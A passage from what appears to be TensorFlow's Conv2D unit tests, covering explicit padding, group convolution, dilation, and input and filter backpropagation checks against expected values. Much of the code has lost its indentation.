tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
padding="VALID",
expected=[50, 60])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID")
@test_util.run_in_graph_and_eager_modes()
def testConv2D0x0Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[0, 0], [0, 0]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[3, 4, 3, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 2],
padding=[[0, 0], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D1x1Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[2, 1, 2, 1],
strides=[1, 1],
padding=[[2, 2], [2, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 1],
padding=[[2, 2], [2, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyBottomPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[0, 3], [0, 0]], tol=2e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[2, 2, 4, 3],
filter_in_sizes=[1, 2, 3, 2],
strides=[2, 2],
padding=[[0, 3], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyTopRightPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[1, 0], [0, 2]],
tol=5e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 4, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 3],
padding=[[1, 0], [0, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DLotsPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 1, 1, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[3, 4], [4, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 1],
filter_in_sizes=[2, 2, 1, 3],
strides=[2, 1],
padding=[[3, 4], [4, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DExplicitPaddingWithDilations(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3])
def testConv2DExplicitPaddingWithLayoutOptimizer(self):
# Test with Grappler's layout optimizer, to ensure the layout optimizer
# handles explicit padding correctly.
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1],
test_grappler_layout_optimizer=True)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3],
test_grappler_layout_optimizer=True)
  def _VerifyGroupConvFwd(self, tensor_in_sizes, filter_in_sizes, dilations,
                          strides, padding, data_format, dtype):
    """Verify the output of group convolution is equal to a for-loop implementation.

    Args:
      tensor_in_sizes: Input tensor dimensions in [batch, input_rows,
        input_cols, input_depth].
      filter_in_sizes: Filter tensor dimensions in [kernel_rows, kernel_cols,
        input_depth, output_depth].
      dilations: Dilated rate: [col_dilation, row_dilation]
      strides: Stride: [col_stride, row_stride]
      padding: Padding type.
      data_format: Format of the data tensors.
      dtype: Data type for inputs and outputs.
    """
    tensor_in = self._CreateNumpyTensor(tensor_in_sizes)
    filter_in = self._CreateNumpyTensor(filter_in_sizes)
    # The group count is implied by the input-depth / filter-depth ratio and
    # must divide the input depth exactly.
    num_groups = tensor_in_sizes[3] // filter_in_sizes[2]
    assert num_groups > 1 and \
        filter_in_sizes[2] * num_groups == tensor_in_sizes[3]
    # device(True) places the ops on GPU; callers are @run_cuda_only.
    with test_util.device(True):
      t1 = constant_op.constant(tensor_in, dtype=dtype)
      t2 = constant_op.constant(filter_in, dtype=dtype)
      strides = [1] + strides + [1]
      dilations = [1] + dilations + [1]
      if data_format == "NCHW":
        t1 = test_util.NHWCToNCHW(t1)
        strides = test_util.NHWCToNCHW(strides)
        dilations = test_util.NHWCToNCHW(dilations)
        # Channels live on axis 1 in NCHW; split the input per group there.
        t1_splits = array_ops.split(t1, num_groups, axis=1)
      else:
        t1_splits = array_ops.split(t1, num_groups, axis=3)
      # Split the filter along its output-depth axis so each piece pairs with
      # one input group.
      t2_splits = array_ops.split(t2, num_groups, axis=3)
      def MakeConv2d(inputs, filters):
        # Helper: a conv2d with the (already NHWC/NCHW-adjusted) parameters.
        return nn_ops.conv2d(
            inputs,
            filters,
            strides,
            padding,
            dilations=dilations,
            data_format=data_format)
      # Fused group convolution vs. per-group loop concatenated back along
      # the channel axis; the two must agree numerically.
      group_conv = MakeConv2d(t1, t2)
      group_conv_loop = array_ops.concat(
          [MakeConv2d(t1s, t2s) for t1s, t2s in zip(t1_splits, t2_splits)],
          axis=1 if data_format == "NCHW" else 3)
      results = self.evaluate([group_conv, group_conv_loop])
      tol_to_use = 1e-5
      self.assertAllClose(
          results[0], results[1], atol=tol_to_use, rtol=tol_to_use)
@test_util.run_in_graph_and_eager_modes
@test_util.run_cuda_only
def testConv2DGroupConvFwd(self):
for data_format in ["NHWC", "NCHW"]:
for dilation in [1, 2]:
for stride in [1, 2]:
self._VerifyGroupConvFwd([10, 32, 32, 16], [3, 3, 4, 8],
dilations=[dilation, dilation],
strides=[stride, stride],
padding="SAME",
data_format=data_format,
dtype=dtypes.float32)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testInputGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testFilterGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
# TODO(yzhwang): this currently fails.
# self._VerifyValues(tensor_in_sizes=[1, 8, 8, 1],
# filter_in_sizes=[2, 2, 1, 1],
# strides=[4, 4], padding="SAME",
# expected=[72, 112, 392, 432])
# Testing for backprops
def _RunAndVerifyBackpropInput(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu,
err,
dilations=(1, 1)):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
x1 = self._CreateNumpyTensor(filter_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
with test_util.device(use_gpu):
if len(input_sizes) == 4:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t0 = constant_op.constant(input_sizes, shape=[len(input_sizes)])
t1 = constant_op.constant(x1, shape=filter_sizes)
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if isinstance(padding, (list, tuple)):
padding = [(0, 0)] + padding + [(0, 0)]
if data_format == "NCHW":
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
if isinstance(padding, (list, tuple)):
padding = test_util.NHWCToNCHW((padding))
conv = nn_ops.conv2d_backprop_input(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
# "values" consists of two tensors for two backprops
value = self.evaluate(conv)
self.assertShapeEqual(value, conv)
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
self.assertAllCloseAccordingToType(expected, value.flatten(), atol=1e-5)
  def _CompareBackpropInput(self, input_sizes, filter_sizes, output_sizes,
                            conv_strides, padding):
    """Checks conv2d_backprop_input agrees across all device/format configs.

    Runs the op with random filter/gradient data under every (data_format,
    use_gpu) combination from GetTestConfigs() and asserts all results are
    close to the first one.
    """
    x1 = np.random.rand(*filter_sizes).astype(np.float32)
    x2 = np.random.rand(*output_sizes).astype(np.float32)
    def _GetVal(data_format, use_gpu):
      # Computes the backprop-input result for one configuration.
      with test_util.device(use_gpu):
        if data_format == "NCHW":
          new_input_sizes = test_util.NHWCToNCHW(input_sizes)
        else:
          new_input_sizes = input_sizes
        t0 = constant_op.constant(new_input_sizes, shape=[len(new_input_sizes)])
        t1 = constant_op.constant(x1, shape=filter_sizes)
        t2 = constant_op.constant(x2, shape=output_sizes)
        strides = [1] + conv_strides + [1]
        if data_format == "NCHW":
          t2 = test_util.NHWCToNCHW(t2)
          strides = test_util.NHWCToNCHW(strides)
        conv = nn_ops.conv2d_backprop_input(
            t0,
            t1,
            t2,
            strides=strides,
            padding=padding,
            data_format=data_format)
        if data_format == "NCHW":
          # Normalize back to NHWC so all configs are comparable.
          conv = test_util.NCHWToNHWC(conv)
        ret = self.evaluate(conv)
        self.assertShapeEqual(ret, conv)
        return ret
    values = []
    for (data_format, use_gpu) in GetTestConfigs():
      values.append(_GetVal(data_format, use_gpu))
    # Every configuration must agree with the first within loose tolerance.
    for i in range(1, len(values)):
      self.assertAllClose(values[0], values[i], rtol=1e-2, atol=1e-2)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropInput(self):
expected_output = [1.0, 4.0, 4.0, 3.0, 10.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropInput(self):
expected_output = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInput(self):
expected_output = [
14.0, 32.0, 50.0, 100.0, 163.0, 226.0, 167.0, 212.0, 257.0, 122.0,
140.0, 158.0, 478.0, 541.0, 604.0, 437.0, 482.0, 527.0
]
for (data_format, use_gpu) in GetTestConfigs():
# The GPU version of this test is not very stable. So adjusting the
# error threshold to 1e-4.
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInputStride1x2(self):
expected_output = [
1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 7.0, 12.0, 11.0, 18.0, 15.0, 24.0, 12.0,
16.0, 15.0, 20.0, 18.0, 24.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropInput(self):
expected_output = [
1.0, 0.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 4.0, 0.0, 0.0, 0.0,
0.0, 0.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
@test_util.disable_xla("XLA requires input_sizes to be a 4D shape.")
def testConv2DInputSizesContainsOnlySpatialDimensionsBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[2, 2],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
  # Testing for backprops
  def _RunAndVerifyBackpropFilter(self,
                                  input_sizes,
                                  filter_sizes,
                                  output_sizes,
                                  strides,
                                  padding,
                                  expected,
                                  data_format,
                                  use_gpu,
                                  dilations=(1, 1),
                                  err=1e-5):
    """Runs conv2d_backprop_filter and compares against `expected`.

    Args:
      input_sizes: NHWC shape of the forward input.
      filter_sizes: Filter shape [kernel_rows, kernel_cols, in_depth,
        out_depth]; the op returns a gradient of this shape.
      output_sizes: NHWC shape of the forward output / gradient in.
      strides: [row_stride, col_stride].
      padding: "VALID"/"SAME" or explicit [[top, bottom], [left, right]].
      expected: Flattened expected filter-gradient values.
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to place ops on GPU.
      dilations: [row_dilation, col_dilation].
      err: Tolerance for assertArrayNear.
    """
    x0 = self._CreateNumpyTensor(input_sizes)
    x2 = self._CreateNumpyTensor(output_sizes)
    dilations = list(dilations)
    explicit_strides = [1] + strides + [1]
    new_padding = padding
    new_dilations = [1] + dilations + [1]
    # Explicit padding gets zero batch/channel pads appended, then (like
    # strides/dilations) is permuted when running in NCHW.
    if isinstance(new_padding, (list, tuple)):
      new_padding = [(0, 0)] + new_padding + [(0, 0)]
    if data_format == "NCHW":
      explicit_strides = test_util.NHWCToNCHW(explicit_strides)
      new_dilations = test_util.NHWCToNCHW(new_dilations)
      if isinstance(padding, (list, tuple)):
        new_padding = test_util.NHWCToNCHW(new_padding)
    # Repeat the check for every dtype supported on the target device.
    for dtype in self._DtypesToTest(use_gpu=use_gpu):
      with test_util.device(use_gpu):
        t0 = constant_op.constant(x0, shape=input_sizes, dtype=dtype)
        t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
        t2 = constant_op.constant(x2, shape=output_sizes, dtype=dtype)
        if data_format == "NCHW":
          t0 = test_util.NHWCToNCHW(t0)
          t2 = test_util.NHWCToNCHW(t2)
        conv = nn_ops.conv2d_backprop_filter(
            t0,
            t1,
            t2,
            strides=explicit_strides,
            padding=new_padding,
            dilations=new_dilations,
            data_format=data_format)
        value = self.evaluate(conv)
        self.assertShapeEqual(value, conv)
      tf_logging.debug("expected = %s", expected)
      tf_logging.debug("actual = %s", value)
      self.assertArrayNear(expected, value.flatten(), err)
  def _CompareBackFilter(self, input_sizes, filter_sizes, output_sizes,
                         conv_strides, padding):
    """Checks conv2d_backprop_filter agrees across all device/format configs.

    Runs the op with random input/gradient data under every (data_format,
    use_gpu) combination from GetTestConfigs() and asserts all results are
    close to the first one.
    """
    x0 = np.random.rand(*input_sizes).astype(np.float32)
    x2 = np.random.rand(*output_sizes).astype(np.float32)
    def _GetVal(data_format, use_gpu):
      # Computes the backprop-filter result for one configuration.
      with test_util.device(use_gpu):
        t0 = constant_op.constant(x0, shape=input_sizes)
        t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
        t2 = constant_op.constant(x2, shape=output_sizes)
        strides = [1] + conv_strides + [1]
        if data_format == "NCHW":
          t0 = test_util.NHWCToNCHW(t0)
          t2 = test_util.NHWCToNCHW(t2)
          strides = test_util.NHWCToNCHW(strides)
        conv = nn_ops.conv2d_backprop_filter(
            t0,
            t1,
            t2,
            strides=strides,
            padding=padding,
            data_format=data_format)
        ret = self.evaluate(conv)
        # The filter gradient has the same layout in both formats, so no
        # NCHW->NHWC conversion is needed here.
        self.assertShapeEqual(ret, conv)
        return ret
    values = []
    for (data_format, use_gpu) in GetTestConfigs():
      values.append(_GetVal(data_format, use_gpu))
    # Every configuration must agree with the first within tolerance.
    for i in range(1, len(values)):
      self.assertAllClose(values[0], values[i], rtol=1e-4, atol=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropFilter(self):
expected = [5.0, 8.0, 14.0, 17.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropFilter(self):
expected = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DBackpropFilterWithEmptyInput(self):
expected = [0, 0, 0, 0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilter(self):
expected = [
17.0, 22.0, 27.0, 22.0, 29.0, 36.0, 27.0, 36.0, 45.0, 32.0, 43.0, 54.0,
37.0, 50.0, 63.0, 42.0, 57.0, 72.0, 62.0, 85.0, 108.0, 67.0, 92.0,
117.0, 72.0, 99.0, 126.0, 77.0, 106.0, 135.0, 82.0, 113.0, 144.0, 87.0,
120.0, 153.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilterStride1x2(self):
expected = [161.0, 182.0, 287.0, 308.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropFilter(self):
expected_output = [78.]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropFilter(self):
expected_output = [1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 4.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
  # Testing for backprops
  def _RunAndVerifyBackpropInputDilation(self, input_sizes, filter_sizes,
                                         output_sizes, strides, dilations,
                                         padding, data_format, use_gpu, err):
    """Checks dilated conv2d input gradients via two equivalent forward ops.

    Builds the same dilated convolution with nn_ops.conv2d and
    nn_ops.convolution, differentiates each w.r.t. the input, and asserts
    the two gradients agree to within `err`.  Non-default dilations are
    only exercised when use_gpu is True.
    """
    x1 = self._CreateNumpyTensor(input_sizes)
    x2 = self._CreateNumpyTensor(filter_sizes)
    default_dilations = (dilations[0] == 1 and dilations[1] == 1)
    if default_dilations or use_gpu:
      with self.cached_session(use_gpu=use_gpu) as sess:
        if data_format == "NCHW":
          input_sizes = test_util.NHWCToNCHW(input_sizes)
        t1 = constant_op.constant(x1, shape=input_sizes)
        t2 = constant_op.constant(x2, shape=filter_sizes)
        full_strides = [1] + strides + [1]
        full_dilations = [1] + dilations + [1]
        if data_format == "NCHW":
          full_strides = test_util.NHWCToNCHW(full_strides)
          full_dilations = test_util.NHWCToNCHW(full_dilations)
        # Two independent graph paths for the same convolution.
        conv_forward = nn_ops.conv2d(
            t1,
            t2,
            strides=full_strides,
            dilations=full_dilations,
            padding=padding,
            data_format=data_format)
        conv_forward_2 = nn_ops.convolution(
            t1,
            t2,
            padding=padding,
            strides=strides,
            dilation_rate=dilations,
            data_format=data_format)
        if data_format == "NCHW":
          conv_forward = test_util.NCHWToNHWC(conv_forward)
          conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
        # d(conv)/d(input) for each path; the two must match.
        conv = gradients_impl.gradients(conv_forward, t1)[0]
        conv_2 = gradients_impl.gradients(conv_forward_2, t1)[0]
        # "values" consists of two tensors for two backprops
        value = self.evaluate(conv)
        value_2 = self.evaluate(conv_2)
        self.assertShapeEqual(value, conv)
        self.assertShapeEqual(value_2, conv_2)
      tf_logging.debug("expected = %s", value_2)
      tf_logging.debug("actual = %s", value)
      self.assertArrayNear(value_2.flatten(), value.flatten(), err)
# Testing for backprops
def _RunAndVerifyBackpropFilterDilation(self, input_sizes, filter_sizes,
output_sizes, strides, dilations,
padding, data_format, use_gpu, err):
x1 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(filter_sizes)
default_dilations = (dilations[0] == 1 and dilations[1] == 1)
if default_dilations or use_gpu:
with self.cached_session(use_gpu=use_gpu) as sess:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t1 = constant_op.constant(x1, shape=input_sizes)
t2 = constant_op.constant(x2, shape=filter_sizes)
full_strides = [1] + strides + [1]
full_dilations = [1] + dilations + [1]
if data_format == "NCHW":
full_strides = test_util.NHWCToNCHW(full_strides)
full_dilations = test_util.NHWCToNCHW(full_dilations)
conv_forward = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilations,
padding=padding,
data_format=data_format)
conv_forward_2 = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilations,
data_format=data_format)
if data_format == "NCHW":
conv_forward = test_util.NCHWToNHWC(conv_forward)
conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
conv = gradients_impl.gradients(conv_forward, t2)[0]
conv_2 = gradients_impl.gradients(conv_forward, t2)[0]
value = self.evaluate(conv)
value_2 = self.evaluate(conv_2)
self.assertShapeEqual(value, conv)
self.assertShapeEqual(value_2, conv_2)
tf_logging.debug("expected = %s", value_2)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(value_2.flatten(), value.flatten(), err)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 4, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputDilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
# The GPU version of this test is not very stable. So adjusting the
# error threshold to 1e-4.
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 2, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropInputDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
